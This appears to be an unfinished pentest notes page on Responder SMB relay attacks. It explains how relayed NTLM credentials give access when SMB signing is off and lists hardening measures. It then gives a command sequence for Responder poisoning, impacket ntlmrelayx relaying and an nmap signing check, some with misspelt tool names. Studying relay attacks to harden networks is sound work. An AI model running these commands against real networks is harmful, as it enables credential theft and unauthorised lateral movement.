Responder SMB Relay is an attack technique where Responder tricks devices into sending NTLM credentials, then relays those credentials via SMB to gain unauthorized access to another system—without needing to crack passwords. This type of attack is effective because Windows systems often trust NTLM authentication requests, and if a server has SMB signing disabled or misconfigured, the attacker can impersonate the victim seamlessly. In practice, this can allow lateral movement across a network, giving the attacker access to files, services, or even full administrative control depending on the privileges of the captured credentials.
The danger of Responder SMB Relay lies in its ability to exploit weaknesses in authentication protocols rather than brute-forcing or cracking passwords. Since NTLM authentication is widely used for compatibility reasons, many environments remain vulnerable if protections such as SMB signing, Extended Protection for Authentication, or disabling legacy name resolution protocols like LLMNR and NetBIOS are not enforced. By relaying credentials instead of attempting to break their encryption, attackers can move quickly and stealthily, often bypassing traditional security monitoring. This makes it critical for organizations to harden their networks against relay attacks and adopt modern authentication standards.
Requirements:
SMB signing must be disabled on the target.
Relayed user credentials must be admin on machine.
SMB Rely Commands
<!--Turn off SMB and HTTP-->
sudo nano /usr/share/responder/Responder.conf
<!--Start Responder-->
sudo responder -I eth0 -wd
<!--Install impacket-scripts-->
sudo apt install impacket-scripts
<!--Impacket Info-->
impacket-DumpNTLMInfo -h
<!--Setup RelyX-->
sudo ntlmrelyx -tf targets.txt -smbsupport
impacket-ntlmrelayx
<!--Check if SMB is required-->
nmap --script=smb2-security-mode.nse -p 445 <target_ip>
In progress